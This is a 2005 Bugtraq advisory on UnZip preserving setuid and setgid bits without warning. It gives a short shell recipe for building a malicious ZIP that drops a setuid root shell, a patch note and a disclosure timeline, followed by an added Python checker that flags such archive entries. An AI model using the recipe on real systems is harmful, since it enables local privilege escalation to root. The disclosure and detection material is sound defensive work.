Bugtraq: 7a69Adv#22 - UNIX unzip keep setuid and setgid files

From: Albert Puigsech Galicia <ripe_at_7a69ezine.org>
Date: Mon, 28 Feb 2005 13:17:02 +0000

------------------------------------------------------------------
       7a69ezine Advisories 7a69Adv#22
------------------------------------------------------------------
  http://www.7a69ezine.org [26/01/2005]
------------------------------------------------------------------

Title: Unzip keep setuid and setgid files

Author: Albert Puigsech Galicia - <ripe_at_7a69ezine.org>

Software: Unzip

Versions: >= 5.51

Remote: No

Exploit: yes

Severity: Low/Medium

------------------------------------------------------------------

I. Introduction.

 UnZip is an extraction utility for archives compressed in .zip format. It's
compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary
objectives have been portability and non-MSDOS functionality. More info about
unzip at http://www.info-zip.org/pub/infozip/UnZip.html.

II. Description.

 The unzip UNIX functionality allows you to maintain file permissions in
compressed files, and of course that includes the setuid bit. Because it does
not show a warning message before unpacking a setuid file, it is possible to
create a malicious ZIP file that creates a setuid executable.

III. Exploit

 It's really easy to test this vulnerability. You can create a malicious ZIP
file following this example:

 $ cp /bin/sh .
 $ chmod 4777 sh
 $ zip malicious.zip sh

 When another user (including root) unpacks the file, a setuid shell file will
be created without any warning, as you can see here:

 # id
 # unzip malicious.zip
 Archive: malicious.zip
  inflating: sh
 # ls -l sh
 -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh

 Of course you need a local account on the system to execute the file, so it's
not a remote vulnerability.

IV. Patch

        Upgrade to unzip 5.52.
 

V. Timeline

12/01/2005 - Bug discovered
16/01/2005 - Vendor contacted
21/01/2005 - Vendor response
25/01/2005 - Vendor patch provided
28/02/2005 - New version published
28/02/2005 - Advisory published

VI. Extra data

 You can find more 7a69ezine advisories at the following link:

    http://www.7a69ezine.org/avisos/propios [Spanish info]
Received on Mar 01 2005
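
A pre-extraction check for the condition the advisory describes, as an added example that is not part of the original post or of the UnZip project: it reads each entry's stored UNIX mode from the archive's central directory and reports entries carrying the setuid or setgid bit, without unpacking anything. The function names are hypothetical, the sample archive is constructed in memory, and the code assumes UNIX-made entries keep their st_mode in the high 16 bits of the external attributes field.

```python
import io
import stat
import zipfile

UNIX = 3  # "version made by" host system code for UNIX in the ZIP format


def special_bit_entries(archive):
    """Return [(name, mode_string, flags)] for entries carrying setuid/setgid."""
    findings = []
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            if info.create_system != UNIX:
                continue  # high 16 bits are only a st_mode for UNIX-made entries
            mode = info.external_attr >> 16
            flags = [name for bit, name in
                     ((stat.S_ISUID, "setuid"), (stat.S_ISGID, "setgid"))
                     if mode & bit]
            if flags:
                findings.append((info.filename, stat.filemode(mode), flags))
    return findings


def build_sample():
    """Constructed in-memory archive: one mode-4777 entry, one ordinary file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, mode in (("sh", 0o104777), ("README", 0o100644)):
            zi = zipfile.ZipInfo(name)
            zi.create_system = UNIX
            zi.external_attr = mode << 16  # S_IFREG | permission bits
            zf.writestr(zi, b"placeholder contents\n")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, mode, flags in special_bit_entries(build_sample()):
        print(f"{name}: {mode} ({', '.join(flags)})")
```

An archive that produces any finding can be rejected, or unpacked as an unprivileged user into a directory on a filesystem mounted nosuid.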
